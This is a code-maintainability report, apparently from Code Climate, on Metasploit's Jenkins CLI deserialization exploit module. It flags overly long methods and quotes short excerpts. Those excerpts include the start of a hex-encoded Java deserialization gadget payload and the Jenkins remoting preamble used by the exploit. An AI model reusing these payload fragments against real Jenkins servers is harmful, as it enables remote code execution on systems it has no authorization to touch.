Sign upLogin

rapid7/metasploit-framework

View on GitHub
Star
modules/exploits/linux/http/jenkins_cli_deserialization.rb

Summary

Maintainability
B
5 hrs
Test Coverage

Method build_obj has 56 lines of code (exceeds 25 allowed). Consider refactoring.
Open

  def build_obj(obj_data)
    payload_data = '00000000aced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61'
    payload_data << '701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742'
    payload_data << 'e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e6375727265'
    payload_data << '6e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e5'
Severity: Major
Found in modules/exploits/linux/http/jenkins_cli_deserialization.rb - About 2 hrs to fix

    Method initialize has 53 lines of code (exceeds 25 allowed). Consider refactoring.
    Open

      def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Jenkins CLI Deserialization',
    Severity: Major
    Found in modules/exploits/linux/http/jenkins_cli_deserialization.rb - About 2 hrs to fix

      Method execute_command has 29 lines of code (exceeds 25 allowed). Consider refactoring.
      Open

        def execute_command(cmd, _opts = {})
    sess_uuid = SecureRandom.uuid
    sess_uri = normalize_uri(target_uri.path, 'cli')
    preamble = '<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
      Severity: Minor
      Found in modules/exploits/linux/http/jenkins_cli_deserialization.rb - About 1 hr to fix

        There are no issues that match your filters.

        Category
        Status